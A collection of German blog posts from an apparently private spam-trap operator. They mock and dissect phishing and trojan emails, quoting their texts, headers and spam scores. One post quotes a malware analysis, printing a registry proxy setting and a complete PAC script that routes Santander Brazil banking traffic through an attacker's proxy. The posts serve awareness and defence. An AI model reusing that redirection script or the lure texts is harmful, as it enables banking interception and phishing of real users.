Trojaner Email ohne Trojaner

Das sieht man auch selten, daß ein Angreifer so derbe ins Klo greift mit seiner Virenemail :

Von: WhαtsΑρρ <idealpropertiesspain5964554552565484@idealpropertiesspain.es>
Subject: Situation aktualisiert am 10.03.2018

Sеhr gееhrtеr Кundе

Bittе schauеn Siе sich dеn WhαtsΑρρ -РDF-Anhαng mit diеsеr E-Mαil αn
um Ihr Jαhrеsabonnеmеnt zu vеrlängеrn

Dankе
WhαtsΑρρ-Untеrstüzung

Nicht nur die kryptischen Versuche einer Worterkennung eines Antispamprogramms zu entgehen fallen auf, nein, auch hatten die Angreifer gar kein „PDF“ Attachment an die Email angehängt 🙂

So was nenne ich mal einen richtigen Fail 😀

Wie üblich, ab in die Tonne!

Google Spam – ganz ohne Google :)

Folgender Textbeitrag landete neulich in unserer Spamfalle :

You have 3 lost emails

Google

We have sent you a message.

11/12/2013
3 lost emails has been found and recovered.
View emails
We hope you found this message to be useful. However, if you'd rather not receive future e-mails of this sort, please [Link opt-out here].

Wenn man mal von dem Datum, das 4 !! Jahre in der Vergangenheit liegt absieht, macht die Mail natürlich gar nichts her. Da würde ich nichmal drauf klicken, wenn die wirklich von Google wäre 🙂 Der Opt-Out Link ging dann natürlich an eine völlig andere Webseite : http://www.ads.kalauz.hu/disagreed.php ( keine Panik, liefert nur noch 404 🙂 )

Wie man an den Headern sehen kann :

From: "Support" <polk@link4pc.com>
Message-ID: <5913e6.b157.35c4ec43@link4pc.com>
Subject:  You have 3 lost emails

Kam das nicht mal mit einem gefälschten Googleansender. Als wirklich, was für eine schlampige Arbeit 😀

Auch mal interessant der Spamreport :

 Pkte Regelname Beschreibung 
---- ---------------------- -------------------------------------------------- 
2.4 DATE_IN_FUTURE_03_06 Absendezeit 3 bis 6 Stunden nach Datum in "Received"-Kopfzeilen 
0.0 HTML_MESSAGE BODY: Nachricht enthält HTML 
1.1 MIME_HTML_ONLY BODY: MIME-Nachricht besteht nur aus HTML

Also Angekommen, bevor sie abgesendet wurde 😀 Über soviel Fehler beim Virenverteilen kann  man echt nur noch laut Lachen !

Wie man Onlinebanking belauscht

„Mami, warum darf ich nicht dieses Attachment öffnen?!!“

„DESWEGEN, Kind :  sans.edu – Example of Targeted Attack Through a Proxy PAC File „

Beschrieben wird in dem verlinkten Artikel ein Angriff auf die Benutzer der Santanderbank in Brasilien. Jetzt blocke ich bei mir eh alles was *com.br am Ende hat, da ich in Brasilien keine Freunde habe, aber scheinbar sehr viel zwilichtige Gestalten gerne meine Freund werden wollen, naja.. vermutlich doch eher Freund meines Rechners 🙂 . Egal, jedenfalls spart einem son Block jede Menge Spams auf Portugiesisch, dessen ich zwar entfernt mächtig bin, es mich aber nicht interessiert. Wer noch was pauschal blocken will, hier noch zwei Evergreens : „*com.ar“, „*com.ag“ und „*@zoho.com“ .  Zoho.com ist gefühlt vermutlich die größte Spamschleuder des Planeten.

Was aber tatsächlich am meisten Spams verhindert hat, war unserem Mailserver zu erzählen, daß er nur noch TLS Verbindungen akzeptiert. Das hat sämtliche Spambots kalt erwischt ( und noch dazu das BSI, Weltbild, Power-Netz, Otto und diverse andere Quellen unerwünschter Wer … ähm Newsletter … 😀 )

Man sollte sich auch nichts erzählen lassen, wer als Mailadmin kein TLS aktiviert hat, hat seinen Job nicht ordentlich gemacht. Wer einem also keine EMails mehr senden kann, sollte dafür die Schuld nicht beim Empfänger, sondern bei sich selbst suchen. Im zweiten Jahrzehnt des 21. Jahrhunderts gehört TLS einfach in jeden Mailserver, egal wo auf der Welt.

Zurück zum Angriff auf Kunden der Santander Bank

Der Artikel beschreibt, das eines Tages eine Email kam… so fängt es heute eigentlich immer an ;)… in der ein böses Attachment war.. ( deswegen haben wir Leute auf der Whiteliste, die uns Attachments schicken dürfen ) . Das Attachment enthielt eine kleine Schadsoftware die nichts weiter gemacht hat, als die Proxyeinstellungen von Winblöd zu ändern.

\REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

In dem „Bild“ steht natürlich nur Text drin:

function FindProxyForURL(url, host)
{
var a = "PROXY 200.98.202.51:1023";
if (shExpMatch(host, "www.san*ander.com.br*")) {
     return a;
}

if (shExpMatch(host, "san*ander.com.br*")) {
     return a;
}

return "DIRECT";
}

Dieses Proxyscript sorgt dann am Ende dafür, daß die Aufrüfe an die Bank zu dem Proxy Server umgeleitet werden. Damit HTTPS geht, jubelt einem das Attachment dann noch ein FAKE Root Cert der Santander Bank unter.  Fertig ist der Onlinebanking-Man-in-the-Middle-Angriff .

Bei Fragen wenden Sie sich bitte an die Designer von Windows 😀

Virus per Online-Einschreiben :D

Ich habe ja gedacht, ich hätte schon jeden Virengag bekommen, aber ein Online-Einschreiben, angeblich von der Post, ich hätte mich fast weggeworfen vor Lachen.

To: "Kundennr. 83386" <SPAMFALLE@SPAMFALLEN.SPAM>
From: "Post AG" <antwort@wildwildsys.com>
Reply-To: <antwort@wildwildsys.com>
Date: Mon, 27 Jun 2016 05:41:45 +0200

Hier der Inhalt:

Sehr geehrte(r)  Kundennr. 83386,

Sie erhalten folgendes Online-Einschreiben mit der Bitte um sofortigen Abruf:

Absender: Rechtsanwalt Maximilian Wagenbauer
Betreff: Auszahlung am 26.06.2016
Online-Ansicht: Hier klicken ( Ablaufdatum 26.06.2016 )
Viren-Prüfung: Erfolgreich, keine Viren

Mit freundlichen Grüßen,
Ihre Post

 

Das „Einschreiben“ kam einen Tag nach dem Datum da drin , also am 27. 😉

Die Domain wildwildsys.com kann man beruhigt auf die Blackliste setzen, die haben in den letzten Tagen nur Spams und Viren verteilt z.B. eine weitere Email auch aus unserer Spamfalle:

wenn Sie unter 55 Jahre alt sind, können Sie jetzt einen extrem

günstigen Krankenkassentarif nutzen:

unter 35 Jahre altab 54,90€/MonatJetzt unverbindlich ansehen
unter 45 Jahre altab 64,90€/MonatJetzt unverbindlich ansehen
unter 55 Jahre altab 79,00€/ MonatJetzt unverbindlich ansehen

Sie sehen, ein Vergleich würde sich in Ihrem Fall sehr lohnen.

Natürlich ist der Vergleich absolut kostenlos und unverbindlich. Mehr dazu auf meiner Seite.

Mit freundlichen Grüßen,

Dr. Hannes Kottke

Ich liebe unsere immer zu 100% richtig liegende Spamfalle 😀

Die Links in diesen Emails gehen praktischerweise auf die Domain wildwildsys.com und nicht wie sonst üblich, auf irgendwelche gehackten Webseiten. Daher kann man annehmen, daß die Betreiber der Domain selbst die Betrüger sind. Soetwas nennt sich dann hochtrabend „Email-Marketingagentur“. Da die Inhaber der Domain sich hinter einem „Privacy Guard“ verstecken, liege ich vermutlich richtig mit meiner Annahme 😉

Einmal gründlich hinsehen lohnt sich : (aus dem Whois )

Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM
Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

Strike! 😀  Und die Domain gibt wirklich …. args..

Sollte Euch also eine Email unter kommen, die diesen Domainnamen nutzt, gleich in die Tonne damit.

dumm – dümmer – Bundestag

Wie gestern bekannt wurde, hat das BSI herausgefunden, wie der Angriff auf den Bundestag abgelaufen ist. Es war ein Insiderjob, denn wie sich herausgestellt hat, sind Bundestagsmitarbeiter und -abgeordnete nicht schlauer als der Durchschnittsbürger.

Der Klassiker: Sie bekommen eine Email mit einem Link drin und klicken einfach drauf.

Nochmal für alle :

1. Keine Emails von Fremden öffnen, auf die man nicht wartet.
2. Keine Links und Emails von Fremden anklicken
3. Wenn man schon 1. + 2. ignoriert, dann nur mit einem Browser bei dem Flash und Javascript abgeschaltet sind und der NICHT von Microsoft stammt.
4. Sich nicht bei den Leuten beschweren, die einem ins Gesicht gesagt haben, daß man selbst Schuld sei an seinem Opferstatus.

Ein bisschen Literatur zum Nachlesen: Archiv

Dichtungstrojaner

Mit Liebesgedichten versuchen Kriminelle derzeit Ihnen Trojaner unter zu jubeln.

Zitate wie diesem :

„Den richtigen Mann liebt man zweimal, einmal am Anfang und dann immer.

K. Hoyer“

folgen Anlagen von Emails wie „6434.zip“  worin dann z.b. das „gambling584.doc“ steckt.

Als treuer Leser dieses Blogs wissen Sie jetzt natürlich bereits, daß das ZIP zur Verdeckung des eigentlichen Trojaners dienen soll, in der Hoffnung, daß die Antispamstools das Zip nicht auspacken. Das Word Document ist wie immer an Windows User gerichtet und sollte auf keinen Fall geöffnet werden.

Neu ist die Gedichtsmasche übrigens nicht. Damit die Heueristiken der Antispamtools nicht so fündig werden, benutzen Spammer schon lange zufällige Textzeilen in den Emails, um die Erkennungsrate niedrig zu halten.

Wem das Gedicht nicht schon merkwürdig vorkam, kann sich natürlich auch mal den Header der Email ansehen:

Received: from [46.27.99.195] (helo=tgssand-soil.com.au)
	by XXXXXXXXXXXXXXXXXXX with smtp (Exim 4.80.1)
	(envelope-from .de>)
	id 1X2Tpg-0007uw-Ha
	for XXXXXXXXXXXXXXXXXXXXXXXXX; Thu, 03 Jul 2014 02:21:57 +0200

Da es sich im eine Deutsche Adresse handeln soll, fällt natürlich der australische Server sofort ins Auge. Da paßt so natürlich nicht zusammen.

X-Mailer: Ironhandedly v3.6

Wie uns Google glaubhaft versichert, gibt es dieses Emailprogramm nicht 🙂

Mehr Beweise braucht man eigentlich nicht mehr um es als Trojaner zu identifizieren. Also weg damit in die digitale Mülltonne.

 

 

 

öfter mal was neues: CAB Viren

Öfter mal was neues, fordern auch immer mehr Spammer und Virenversender. Heute hatten wir mal wieder was „neues“ im Postfach der Spamfalle: als Rechnung getarnte Windows „CAB“ Files.

Natürlich ist es nicht wirklich „neu“, sondern hängt von der aktuellen Schwachstellenlage bei Windows ab. CAB Files gab es schon früher, aber seit wir das Blog dazu schreiben, hatten wir noch keine einzige im Postfach. Es scheint etwas aus der Mode gekommen zu sein.

Die Email an sich hat leider nicht viel interessantes zu vermelden, keine krassen Grammatikfehler, keine Rechtschreibschwäche, keine lustigen HTML Elemente, kurz um aus unserer Sicht: total langweilig.

Der Email-Header:

Return-path: <auftrag@vodafone-telecommerce.de>
Received: from 93-62-140-242.ip22.fastwebnet.it ([93.62.140.242] helo=kdzbmpr.kelezter.info)
	by unser.server.de with smtp (Exim 4.80.1)
	(envelope-from <auftrag@vodafone-telecommerce.de>)
	id 1WwJUs-0001rj-3e
	for unsere@spamfalle; Mon, 16 Jun 2014 11:51:34 +0200
From: "Mümün Blume" <auftrag@vodafone-telecommerce.de>
Date: Mon, 16 Jun 2014 11:51:12 +0200
MIME-Version: 1.0
Message-ID: <11293172932-interrupting@vodafone-telecommerce.de>
X-Mailer: Rescuers v5.3
Subject:  Bestellen 9183837644

An dem Header kann man nur das übliche aussetzen, daß der angebliche Absender nicht zum Servernamen paßt, der die Email wirklich gemailt hat und natürlich der Name des Mailers, der das verschickt hat .

Guten Tag,

Wir danken Sie für die Benutzung unserer Dienstleistungen.
Ihre Bestellung #9183837644 wird 19.06.2014 verschickt werden. 

Transaktionsnummer: D8FC1234A42D 
Datum: 16.06.2014 09:38:21 
Summe: €101.39 
Bezahlungstyp: Kreditkarte 

Die ganze Summe können Sie in der Datei rechnung286.cab herunterladen. 

Mit freundlichen Grüßen,
 Mümün Blume
 +4939718350893

Beim Auswürfeln des Namens hatte die KI des Spammerrechners bestimmt viel Spaß.

Wenn Sie diese „Rechnung“ bekommen sollten, wie üblich ab in die Tonne damit.

Wenn man schlechte Viren zu spät mailt

… oder wieso manche Virenmail einfach nur schlecht ist.

Ja, es ist wiedermal soweit, ein Virus hat es mal wieder durch die Servertests geschafft.

Der Virus/Trojaner mit dem bedrohlichen Betreff: „überfällige Zahlung“ schlug heute bei uns in der Spamfalle auf. Ich gebs zu, so eine Spamfalle ist ein 100% Indikator dafür, daß es ein Virus/Trojaner ist und ich schaue nicht mehr selbst nach. Da nicht jeder diesen Luxus hat, hier wieder die Merkmale die nicht stimmen.

Vorweg, die IP Adresse ist nur auf den ersten Blick verdächtig, weil Sie entgegen des verwendeten Hostnames nicht nach Russland zeigt, aber bei einem 65535 IP-Adressen umfassenden Netzwerkblock ist das keine Seltenheit.

From - Thu Apr 17 09:11:52 2014
Return-path: <enfranchised@frankfurterinkasso.de>
Envelope-to: to@address
Delivery-date: Wed, 16 Apr 2014 02:17:37 +0200
Received: from [190.246.114.25] (helo=osafnoby.peerline.ru)
	by hostname with smtp (Exim 4.80.1)
	(envelope-from <enfranchised@frankfurterinkasso.de>)
	id XXXXXXXXXXXXXXXXXXXXXX
	for to@address; Wed, 16 Apr 2014 02:17:37 +0200
Message-ID: <201404152349143086839sochi@frankfurterinkasso.de>
Date: Tue, 16 Apr 2014 18:31:18 -0300
From: "Gutta Sebastian" <enfranchised@frankfurterinkasso.de>
X-Mailer: Vaporier v3.8
MIME-Version: 1.0
To: <to@address>
X-Antivirus: avast! (VPS 140415-2, 16/04/2014), Outbound message
X-Antivirus-Status: Not-Tested
Subject:  =?utf-8?b?w7xiZXJmw6RsbGlnZSBaYWhsdW5n?=

Content-Type: application/x-zip-compressed;
 name="kostenplan.zip"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="kostenplan.zip"

Eine Software Vaporier v3.8 ist im googleindizierten Netz nicht zu finden, und im Stil eines übermächtigen Verbrecheregos ein üblicher Name. Eine Email mit einer deutschen Adresse, kommt selten aus Russland.

Das Attachment ist natürlich ein ZIP, damit die Virenscanner nicht so genau hinsehen.

Wie üblich, ab in die Tonne mit der Email.

Achja, Avira AntiVirus war ausnahmsweise schneller als unser Servervirenscanner und kannte den Virus schon. Deswegen, zu spät gemailt Jungs 🙂

Die Hotelbuchungen sind wieder da…

jaja.. der Trojanerzyklus ist wiedermal bei gefälschten hotel.de Buchungsbestätigungen nebst Virus angekommen.

Aufällig diesmal, ein und dieselbe Buchung kostet mal 88 €, mal 25 € . Natürlich können Sie das nur bemerken, wenn Sie wie ich mehrere davon geschickt bekommen haben.

Am einfachsten schauen Sie sich den Dateinamen des Attachments/Anhangs an: „HotelReservierung8930903.pdf.zip“

„blahblah…..pdf.zip“ macht keinen Sinn, denn PDF Dateien sind bereits gepackt. Ein ZIP Archiver kann daher keinen positiven Effekt auf die Größe der Email haben. ZIP wird dazu benutzt, daß die Antiviren und Antispamprogramme dieser Welt, die ZIP Datei nicht auspacken und somit den Virus durchgehen lassen.

Mittlerweile werden solche Doppelendungsfiles zurecht pauschal als Virus behandelt und aussortiert.